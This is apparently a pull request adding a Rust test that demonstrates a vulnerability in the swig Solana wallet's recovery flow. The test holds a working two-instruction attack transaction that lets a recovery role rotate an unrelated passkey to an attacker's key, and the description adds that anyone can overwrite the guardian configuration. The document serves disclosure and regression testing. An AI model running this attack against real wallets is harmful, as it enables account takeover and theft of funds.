### PR TITLE
bug: replace mutating passkey

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -9456,6 +9456,7 @@ dependencies = [
  "swig-assertions",
  "swig-compact-instructions",
  "swig-interface",
+ "swig-recovery",
  "swig-state",
  "test-log",
 ]

--- a/program/Cargo.toml
+++ b/program/Cargo.toml
@@ -32,6 +32,7 @@ default-env = "=0.1.1"
 solana-sdk = "3.0.0"
 rand = "0.9.0"
 swig-interface = { path = "../interface" }
+swig-recovery = { path = "../recovery", features = ["no-entrypoint"] }
 litesvm-token = { version = "0.10.0" }
 litesvm = { version = "0.10.0", features = ["precompiles"] }
 test-log = "0.2.16"

--- a/program/tests/recover_authority_test.rs
+++ b/program/tests/recover_authority_test.rs
@@ -10,6 +10,7 @@ use solana_sdk::{
     pubkey::Pubkey,
     signature::Keypair,
     signer::Signer,
+    sysvar::clock::Clock,
     transaction::VersionedTransaction,
 };
 use swig_interface::{AuthorityConfig, ClientAction, RecoverAuthorityInstruction};
@@ -258,4 +259,229 @@ fn test_program_exec_recovery_requires_recovery_authority_permission() {
         .unwrap();
 
     assert_eq!(recovered_authority.public_key, old_passkey);
+}
+
+// BUG Demo — against the real swig-recovery program.
+//
+// Setup:
+//   - Wallet has two passkey roles: 
+//     Role 1 (primary) - secp256r1 authority which is for recovry
+//     role 2 (secondary, with Manage or worse ALL permissions). 
+//     Role 3 is a ProgramExec/RecoveryAuthority role, used for recovery
+//
+//   - The swig-rec program is configured for role 1 with the user's
+//     primary passkey as old_authority and a chosen new_legit_passkey as
+//     new_authority. The guardian starts the recovery normally. The
+//     timelock elapses.
+//
+// Attack: a single transaction with two instructions:
+//   [0] swi-rec execute_recovery_v1 ix — supplies (primary, new_legit)
+//       so its old/new authority hashes match the pending state. This marks
+//       pending(role=1) Executed. accounts[0]=swig, accounts[1]=swig_wallet
+//       so the swig ProgramExec gate is satisfied.
+//   [1] swig.RecoverAuthorityV1(target_role_id=2, old=secondary, new=attacker)
+//       — the args address role 2, NOT role 1. Swig does not read the
+//       pending state and the ProgramExec gate does not bind the target
+//       role or the new authority.
+//
+// Outcome: role 2's passkey is rotated to attacker_passkey. Role 1 — the
+// actual subject of the legitimate recovery — is untouched, but its
+// pending recovery slot is now `Executed`, and the legit flow is denied
+#[test_log::test]
+fn bug_recovery_role_can_rotate_unrelated_passkey() {
+    let mut context = setup_test_context().unwrap();
+    let root_authority = Keypair::new();
+
+    // Load the real swig-recovery program at its declared ID.
+    let recovery_program_id = Pubkey::new_from_array(swig_recovery::ID.to_bytes());
+    let recovery_so = std::fs::read("../target/deploy/swig_recovery.so")
+        .expect("Run `cargo build-sbf` first to produce swig_recovery.so");
+    context
+        .svm
+        .add_program(recovery_program_id, &recovery_so)
+        .unwrap();
+
+    context
+        .svm
+        .airdrop(&root_authority.pubkey(), 10_000_000_000)
+        .unwrap();
+
+    let primary_passkey = create_test_secp256r1_public_key();
+    let secondary_passkey = create_test_secp256r1_public_key();
+    let new_legit_passkey = create_test_secp256r1_public_key();
+    let attacker_passkey = create_test_secp256r1_public_key();
+
+    let guardian = Keypair::new();
+    let operator = Keypair::new();
+    context
+        .svm
+        .airdrop(&guardian.pubkey(), 1_000_000_000)
+        .unwrap();
+    context
+        .svm
+        .airdrop(&operator.pubkey(), 1_000_000_000)
+        .unwrap();
+
+    let id = rand::random::<[u8; 32]>();
+    let swig_conf = Pubkey::find_program_address(&swig_account_seeds(&id), &program_id()).0;
+    let swig_wallet =
+        Pubkey::find_program_address(&swig_wallet_address_seeds(swig_conf.as_ref()), &program_id()).0;
+
+    create_swig_ed25519(&mut context, &root_authority, id).unwrap();
+
+    // Role 1: primary passkey
+    add_authority_with_ed25519_root(
+        &mut context,
+        &swig_conf,
+        &root_authority,
+        AuthorityConfig {
+            authority_type: AuthorityType::Secp256r1,
+            authority: &primary_passkey,
+        },
+        vec![ClientAction::ManageAuthority(ManageAuthority {})],
+    )
+    .unwrap();
+
+    // Role 2: second secp256r1 authority, with Manage action
+    add_authority_with_ed25519_root(
+        &mut context,
+        &swig_conf,
+        &root_authority,
+        AuthorityConfig {
+            authority_type: AuthorityType::Secp256r1,
+            authority: &secondary_passkey,
+        },
+        vec![ClientAction::ManageAuthority(ManageAuthority {})],
+    )
+    .unwrap();
+
+    // Role 3: recovery role gated by the real swig-recovery program.
+    let recovery_program_id_bytes = recovery_program_id.to_bytes();
+    let program_exec_data = ProgramExecAuthority::create_authority_data(
+        &recovery_program_id_bytes,
+        &swig_recovery::instruction::EXECUTE_RECOVERY_V1_DISCRIMINATOR,
+    );
+    add_authority_with_ed25519_root(
+        &mut context,
+        &swig_conf,
+        &root_authority,
+        AuthorityConfig {
+            authority_type: AuthorityType::ProgramExec,
+            authority: &program_exec_data,
+        },
+        vec![ClientAction::RecoveryAuthority(RecoveryAuthority {})],
+    )
+    .unwrap();
+
+    // ----- Legitimate recovery flow against role 1 -----
+
+    let delay_slots = 10u64;
+    let org_config_placeholder = Pubkey::new_unique();
+
+    // configure_recovery_v1: the recovery program accepts any signer as
+    // "operator" — it does not validate operator identity or require the
+    // wallet owner to approve.
+    let configure_ix = swig_recovery::instruction::configure_recovery_v1_instruction(
+        recovery_program_id,
+        context.default_payer.pubkey(),
+        operator.pubkey(),
+        org_config_placeholder,
+        swig_wallet,
+        1,
+        guardian.pubkey(),
+        delay_slots,
+    );
+    submit(&mut context, &[configure_ix], &[&operator]);
+
+    // Guardian starts the legitimate recovery: rotate role 1's primary
+    // passkey to new_legit_passkey after the timelock.
+    let start_ix = swig_recovery::instruction::start_recovery_v1_instruction(
+        recovery_program_id,
+        context.default_payer.pubkey(),
+        guardian.pubkey(),
+        swig_wallet,
+        1,
+        primary_passkey,
+        new_legit_passkey,
+    );
+    submit(&mut context, &[start_ix], &[&guardian]);
+
+    // Wait till cooldown.
+    context.svm.warp_to_slot(context.svm.get_sysvar::<Clock>().slot + delay_slots + 1);
+    context.svm.expire_blockhash();
+
+    // ----- Attack transaction -----
+
+    let execute_ix = swig_recovery::instruction::execute_recovery_v1_instruction(
+        recovery_program_id,
+        swig_conf,                // accounts[0] — ProgramExec gate expects swig here
+        swig_wallet, // accounts[1] — ProgramExec gate expects this here
+        1,                   // pending PDA for role 1 (the only one that exists)
+        primary_passkey,     // matches pending.old_authority_hash
+        new_legit_passkey,   // matches pending.new_authority_hash
+    );
+    let attack_ixs = RecoverAuthorityInstruction::new_with_program_exec(
+        swig_conf,
+        swig_wallet,
+        execute_ix,
+        3,                 // acting recovery role
+        2,                 // target = role 2, NOT role 1
+        secondary_passkey, // current secondary passkey
+        attacker_passkey,  // attacker-chosen replacement
+    )
+    .unwrap();
+
+    // BUG: this succeeds. swig has no way to know the executing recovery
+    // was about role 1, not role 2.
+    send_recovery_transaction(&mut context, &attack_ixs).unwrap();
+
+    // Verify the damage.
+    let swig_account = context.svm.get_account(&swig_conf).unwrap();
+    let swig_state = SwigWithRoles::from_bytes(&swig_account.data).unwrap();
+
+    let role_two = swig_state.get_role(2).unwrap().unwrap();
+    let role_two_authority = role_two
+        .authority
+        .as_any()
+        .downcast_ref::<Secp256r1Authority>()
+        .unwrap();
+    assert_eq!(
+        role_two_authority.public_key, attacker_passkey,
+        "BUG: secondary passkey was rotated to attacker's key, despite the \
+         executing recovery being for role 1",
+    );
+
+    // Role 1 untouched — and the legitimate recovery for role 1 is now
+    // wedged because pending(role=1).status == Executed.
+    let role_one = swig_state.get_role(1).unwrap().unwrap();
+    let role_one_authority = role_one
+        .authority
+        .as_any()
+        .downcast_ref::<Secp256r1Authority>()
+        .unwrap();
+    assert_eq!(
+        role_one_authority.public_key, primary_passkey,
+        "primary passkey was not actually rotated, but its pending slot has \
+         been silently marked Executed",
+    );
+}
+
+fn submit(
+    context: &mut SwigTestContext,
+    instructions: &[Instruction],
+    extra_signers: &[&Keypair],
+) {
+    context.svm.expire_blockhash();
+    let msg = v0::Message::try_compile(
+        &context.default_payer.pubkey(),
+        instructions,
+        &[],
+        context.svm.latest_blockhash(),
+    )
+    .unwrap();
+    let payer = context.default_payer.insecure_clone();
+    let mut signers: Vec<&Keypair> = vec![&payer];
+    signers.extend_from_slice(extra_signers);
+    let tx = VersionedTransaction::try_new(VersionedMessage::V0(msg), signers.as_slice()).unwrap();
+    context.svm.send_transaction(tx).unwrap();
 }


### PR DESCRIPTION
A role with the RecoveryAuthority permission can rotate any Secp256r1 passkey on the wallet to any new key, with no key compromise required.

  Why it works

- The recovery flow has two on-chain steps that are supposed to be linked: swig_recovery.execute_recovery_v1 (verifies pending state) and swig.RecoverAuthorityV1 (does the rotation). The link between them is
- ProgramExec, which only proves "the preceding instruction called program X with discriminator Y" — it does not check the data of that instruction.

So the swig program rotates whatever its own args say to rotate, without ever looking at the PendingRecoveryV1 state the recovery program just verified.

The attack
- [0] swig_recovery.execute_recovery_v1  ─ verifies pending for role 1, flips to Executed
- [1] swig.RecoverAuthorityV1            ─ args say "rotate role 2 to attacker_passkey" swig sees ProgramExec was satisfied → rotates role 2

The two instructions disagree about which role and which new key. Swig has no way to notice.

  The recovery role has no keypair — its authority is ProgramExec, satisfied by transaction shape. And configure_recovery_v1 lets anyone appoint themselves as guardian by overwriting the config silently. So an attacker can drive the entire flow with their own keys against any wallet that has a recovery role set up.